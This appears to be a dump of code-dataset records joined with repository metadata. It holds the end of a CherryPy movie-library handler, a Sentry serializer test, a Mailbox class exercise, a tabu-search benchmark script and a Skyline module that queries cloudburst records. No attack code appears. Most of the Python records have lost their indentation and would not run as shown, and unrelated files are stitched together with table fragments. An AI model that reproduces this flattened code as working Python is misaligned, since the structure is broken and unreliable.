yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
        logging.info('Adding {} Finished CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
title = movie['title']
year = movie['year']
imdbid = movie['imdbid']
quality = movie['quality']
logging.info("Performing backlog search for {} {}.".format(title, year))
if not self.searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, "index": i + 1})
continue
db_reset = {'quality': 'Default',
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple('MOVIES', db_reset, imdbid=imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, "index": i + 1})
continue
yield json.dumps({'response': True, "index": i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return core.manage.get_stats()
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
logging.error('Unable to restore backup.', exc_info=True)
return {'response': False, 'error': str(e)}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
| [
"[email protected]"
]
| |
12598f014099deae48cea3f0402d007713858b5a | 1fc45a47f0e540941c87b04616f3b4019da9f9a0 | /tests/sentry/api/serializers/test_grouptagvalue.py | d328f092a3656452391add7aa2fc5d6ee396d281 | [
"BSD-2-Clause"
]
| permissive | seukjung/sentry-8.15.0 | febc11864a74a68ddb97b146cc1d2438ef019241 | fd3cab65c64fcbc32817885fa44df65534844793 | refs/heads/master | 2022-10-28T06:39:17.063333 | 2018-01-17T12:31:55 | 2018-01-17T12:31:55 | 117,833,103 | 0 | 0 | BSD-3-Clause | 2022-10-05T18:09:54 | 2018-01-17T12:28:13 | Python | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import EventUser, GroupTagValue, TagValue
from sentry.testutils import TestCase
class GroupTagValueSerializerTest(TestCase):
def test_with_user(self):
user = self.create_user()
project = self.create_project()
euser = EventUser.objects.create(
project=project,
email='[email protected]',
)
tagvalue = TagValue.objects.create(
project=project,
key='sentry:user',
value=euser.tag_value,
)
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key=tagvalue.key,
value=tagvalue.value,
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == euser.get_label()
def test_with_no_tagvalue(self):
user = self.create_user()
project = self.create_project()
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key='sentry:user',
value='email:[email protected]',
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == grouptagvalue.value
| [
"[email protected]"
]
| |
d96347873e9e35694bfbbc5d8c3adf35d0c11a59 | 157d0810d40bbb165889f946566346663cf5b22f | /Python-For-Everyone-Horstmann/Chapter9-Objects-and-Classes/P9_25.py | 4f372df40188975237fd47929d3e6603486ef014 | []
| no_license | dg5921096/Books-solutions | e6ccdcaba0294bdc95e2267723a02d2ba090cb10 | 31bb4bba240bf95aafeb6d189eade62c66a1765a | refs/heads/master | 2021-12-09T16:07:47.756390 | 2021-11-14T07:09:25 | 2021-11-14T07:09:25 | 255,447,147 | 0 | 0 | null | 2020-04-13T21:39:02 | 2020-04-13T21:39:01 | null | UTF-8 | Python | false | false | 794 | py | # Design a class Mailbox that stores e-mail messages, using the Message class of Exercise
# P9.24. Implement the following methods:
# • def addMessage(self, message)
# • def getMessage(self, index)
# • def removeMessage(self, index)
class Mailbox():
def __init__(self):
self._mails = []
def list_messages(self):
output = []
for i, message in enumerate(self._mails):
output.append("[{}] From: {}, To: {}".format(i, message.get_sender(), message.get_recipient()))
return "\n".join(output)
def add_message(self, message_object):
self._mails.append(message_object)
def get_message(self, index):
return self._mails[index].to_string()
def remove_message(self, index):
del self._mails[index]
| [
"[email protected]"
]
| |
69125d0d670089b391b47812638b43f7c459c0b5 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322174510.py | 7aa63cf5264177dcd88e4e6fbb297d2a899aa036 | []
| no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,365 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 100
tabuIteration = '1000'
tabuDuration = '40'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
if int(solution) != 5644:
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('{} : best found solution is {} and found in iteration {}, number of solutions before convergence : {}'.format(i, solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimal solutions found is {optimum_result}, so in {numberOfTests} runs of the test we converged to the optimum in {(optimum_result/numberOfTests)*100}% of runs')
print(f'on average this test shows that we found the global optimum solution at iteration {mean(list_coverage)}\nand in the worst case we found it at iteration {max(list_coverage)} \nand in the best case at iteration {min(list_coverage)}')
print(f'In total, {sum(list_coverage)} iterations were run before finding the global optimum across {numberOfTests} runs of this test\n\n\n')
unique_local_minimum = list(dict.fromkeys(local_minimum))
print(f'in total the algorithm was stuck in a local optimum {len(local_minimum)} times \nthere are {len(unique_local_minimum)} unique local minima \nthe best local optimum is {min(unique_local_minimum)} \nthe worst local optimum is {max(unique_local_minimum)}')
"[email protected]"
]
| |
39594fdee131460d72ed27b8368bb94bb8fdcf98 | 50203b4a349dcb2ed1e72c9f5463d84db8a6e983 | /skyline/webapp/luminosity_cloudbursts.py | 0048fa8b6fb7fcecf903537da9ede688c880d75c | [
"MIT"
]
| permissive | earthgecko/skyline | 97e43df824d7c92d68086f529f0f3d051a7debb0 | c2edc451e63d5eb57117ddcfbc6e79100e706460 | refs/heads/master | 2023-08-30T08:36:50.740285 | 2023-06-28T15:33:47 | 2023-06-28T15:33:47 | 20,475,900 | 482 | 74 | NOASSERTION | 2023-06-28T15:33:49 | 2014-06-04T08:33:15 | Python | UTF-8 | Python | false | false | 12,756 | py | import logging
import os
from ast import literal_eval
import traceback
import settings
import skyline_version
from skyline_functions import get_redis_conn_decoded
from matched_or_regexed_in_list import matched_or_regexed_in_list
from sqlalchemy.sql import select
from database import get_engine, cloudburst_table_meta
# @added 20221103 - Task #2732: Prometheus to Skyline
# Branch #4300: prometheus
from functions.metrics.get_base_name_from_labelled_metrics_name import get_base_name_from_labelled_metrics_name
skyline_version = skyline_version.__absolute_version__
skyline_app = 'webapp'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
try:
ENABLE_WEBAPP_DEBUG = settings.ENABLE_WEBAPP_DEBUG
except AttributeError as outer_err:
logger.error('error :: cannot determine ENABLE_WEBAPP_DEBUG from settings - %s' % outer_err)
ENABLE_WEBAPP_DEBUG = False
this_host = str(os.uname()[1])
def get_filtered_metrics(redis_conn_decoded, namespaces):
"""
Create a list of metrics (filter_by_metrics) whose names match the given namespaces.
:param redis_conn_decoded: the decoded Redis connection object
:param namespaces: the namespaces to match
:type namespaces: list
:return: list of metrics
:rtype: list
"""
function_str = 'get_cloudbursts :: get_filtered_metrics'
filter_by_metrics = []
redis_key = 'analyzer.metrics_manager.db.metric_names'
unique_base_names = []
try:
unique_base_names = list(redis_conn_decoded.smembers(redis_key))
if unique_base_names:
logger.info('%s :: got %s unique_base_names' % (
function_str, str(len(unique_base_names))))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get Redis key %s - %s' % (
function_str, redis_key, err))
raise
for base_name in unique_base_names:
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, namespaces)
if pattern_match:
filter_by_metrics.append(base_name)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: matched_or_regexed_in_list failed for %s - %s' % (
function_str, base_name, err))
return filter_by_metrics
def get_metric_ids(redis_conn_decoded, filter_by_metrics):
"""
Create a list of metric ids and a dict of metric_names_with_ids for the given metrics.
:param redis_conn_decoded: the decoded Redis connection object
:param filter_by_metrics: the metric names to look up
:type filter_by_metrics: list
:return: (list of metric ids, dict of metric_names_with_ids)
:rtype: (list, dict)
"""
function_str = 'get_cloudbursts :: get_metric_ids'
metric_ids = []
try:
metric_names_with_ids = redis_conn_decoded.hgetall('aet.metrics_manager.metric_names_with_ids')
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get Redis hash aet.metrics_manager.metric_names_with_ids - %s' % (
function_str, err))
raise
for base_name in filter_by_metrics:
try:
metric_ids.append(int(metric_names_with_ids[base_name]))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to add metric id to metric_ids for %s from metric_names_with_ids - %s' % (
function_str, base_name, err))
return (metric_ids, metric_names_with_ids)
def get_cloudbursts(metric, namespaces, from_timestamp, until_timestamp):
"""
Create a dict of all the cloudbursts for the given metric (or all metrics), namespaces and time range.
:param metric: the name of the metric
:param namespaces: the namespaces to match
:param from_timestamp: the from_timestamp
:param until_timestamp: the until_timestamp
:type metric: str
:type namespaces: list
:type from_timestamp: int
:type until_timestamp: int
:return: dict of cloudbursts
:rtype: {}
Returns a dict of cloudbursts
{
"cloudbursts": {
<id>: {
'metric_id': <int>,
'metric': <str>,
'timestamp': <int>,
'end': <int>,
'duration': <int>,
'from_timestamp': <int>,
'resolution': <int>,
'full_duration': <int>,
'anomaly_id': <int>,
'match_id': <int>,
'fp_id': <int>,
'layer_id': <int>,
'added_at': <int>,
},
}
}
"""
function_str = 'get_cloudbursts'
cloudbursts_dict = {}
engine = None
metric_ids = []
use_filter_by_metrics = False
filter_by_metrics = []
metric_names_with_ids = {}
ids_with_metric_names = {}
logger.info(
'get_cloudbursts - metric: %s, namespaces: %s, from_timestamp: %s, until_timestamp: %s' % (
str(metric), str(namespaces), str(from_timestamp),
str(until_timestamp)))
if metric != 'all':
# @added 20221103 - Task #2732: Prometheus to Skyline
# Branch #4300: prometheus
use_metric = str(metric)
if metric.startswith('labelled_metrics.'):
use_metric = str(metric)
try:
metric = get_base_name_from_labelled_metrics_name(skyline_app, use_metric)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: get_base_name_from_labelled_metrics_name failed with %s - %s' % (
function_str, metric, err))
raise
logger.info(
'get_cloudbursts - looked up %s to metric: %s' % (
use_metric, str(metric)))
if not metric:
logger.error('error :: %s :: failed to look up metric' % function_str)
raise ValueError('failed to look up metric')
filter_by_metrics = [metric]
use_filter_by_metrics = True
if not namespaces:
namespaces = [metric]
if namespaces == ['all']:
namespaces = [metric]
try:
redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: get_redis_conn_decoded failed - %s' % (
function_str, err))
raise
filter_by_metrics = get_filtered_metrics(redis_conn_decoded, namespaces)
if namespaces:
use_filter_by_metrics = True
if metric != 'all':
try:
metric_id = int(redis_conn_decoded.hget('aet.metrics_manager.metric_names_with_ids', metric))
if metric_id:
metric_names_with_ids[metric] = metric_id
metric_ids.append(metric_id)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get %s from Redis hash aet.metrics_manager.metric_names_with_ids - %s' % (
function_str, metric, err))
raise
metric_ids, metric_names_with_ids = get_metric_ids(redis_conn_decoded, filter_by_metrics)
if len(filter_by_metrics) > 1:
use_filter_by_metrics = True
for base_name in list(metric_names_with_ids.keys()):
metric_id = int(metric_names_with_ids[base_name])
ids_with_metric_names[metric_id] = base_name
try:
engine, log_msg, trace = get_engine(skyline_app)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get engine - %s' % (
function_str, err))
raise
try:
cloudburst_table, log_msg, trace = cloudburst_table_meta(skyline_app, engine)
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get cloudburst_table - %s' % (
function_str, err))
raise
try:
connection = engine.connect()
if use_filter_by_metrics:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids))
if from_timestamp > 0 and until_timestamp == 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp >= from_timestamp)
if from_timestamp == 0 and until_timestamp > 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp <= until_timestamp)
if from_timestamp > 0 and until_timestamp > 0:
stmt = select([cloudburst_table], cloudburst_table.c.metric_id.in_(metric_ids)).\
where(cloudburst_table.c.timestamp >= from_timestamp).\
where(cloudburst_table.c.timestamp <= until_timestamp)
else:
stmt = select([cloudburst_table])
if from_timestamp > 0 and until_timestamp == 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp >= from_timestamp)
if from_timestamp == 0 and until_timestamp > 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp <= until_timestamp)
if from_timestamp > 0 and until_timestamp > 0:
stmt = select([cloudburst_table]).\
where(cloudburst_table.c.timestamp >= from_timestamp).\
where(cloudburst_table.c.timestamp <= until_timestamp)
results = connection.execute(stmt)
for row in results:
# @modified 20230126
# Wrapped in try except
try:
cloudburst_id = row['id']
metric_id = row['metric_id']
cloudbursts_dict[cloudburst_id] = dict(row)
try:
cloudbursts_dict[cloudburst_id]['metric'] = ids_with_metric_names[metric_id]
except KeyError:
use_metric_name = 'labelled_metrics.%s' % str(metric_id)
logger.warning('warning :: %s :: failed to find metric name for metric id in ids_with_metric_names, using %s' % (
function_str, use_metric_name))
cloudbursts_dict[cloudburst_id]['metric'] = use_metric_name
except Exception as err:
logger.error('error :: %s :: failed to iterate row from cloudburst_table - %s' % (
function_str, err))
connection.close()
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: %s :: failed to get cloudburst_table - %s' % (
function_str, err))
raise
# Reorder the dict keys for the page
cloudbursts_dict_keys = []
key_ordered_cloudbursts_dict = {}
if cloudbursts_dict:
cloudburst_ids = list(cloudbursts_dict.keys())
first_cloudburst_id = cloudburst_ids[0]
for key in list(cloudbursts_dict[first_cloudburst_id].keys()):
cloudbursts_dict_keys.append(key)
for cloudburst_id in cloudburst_ids:
key_ordered_cloudbursts_dict[cloudburst_id] = {}
for key in cloudbursts_dict[cloudburst_id]:
if key == 'id':
key_ordered_cloudbursts_dict[cloudburst_id][key] = cloudbursts_dict[cloudburst_id][key]
key_ordered_cloudbursts_dict[cloudburst_id]['metric'] = cloudbursts_dict[cloudburst_id]['metric']
for key in cloudbursts_dict[cloudburst_id]:
if key not in ['id', 'metric']:
key_ordered_cloudbursts_dict[cloudburst_id][key] = cloudbursts_dict[cloudburst_id][key]
cloudbursts_dict = key_ordered_cloudbursts_dict
cloudburst_ids = list(cloudbursts_dict.keys())
cloudburst_ids.reverse()
desc_cloudbursts_dict = {}
for c_id in cloudburst_ids:
desc_cloudbursts_dict[c_id] = cloudbursts_dict[c_id]
cloudbursts_dict = desc_cloudbursts_dict
logger.info('%s :: found %s cloudbursts' % (
function_str, str(len(list(cloudbursts_dict.keys())))))
return cloudbursts_dict
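# Hedged usage sketch (not part of the original module): get_cloudbursts() is
# normally called from the webapp route handlers, so the demo below is guarded
# and assumes a fully configured Skyline instance (settings, MySQL and Redis
# reachable). The namespace pattern and timestamps are hypothetical.
if __name__ == '__main__':
    example_cloudbursts = get_cloudbursts(
        'all', ['telegraf\\..*\\.cpu'], 1646092800, 1646179200)
    for example_id, example_item in example_cloudbursts.items():
        # each value carries the metric name plus the cloudburst window details
        print(example_id, example_item['metric'], example_item['timestamp'],
              example_item['duration'])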
| [
"[email protected]"
]
|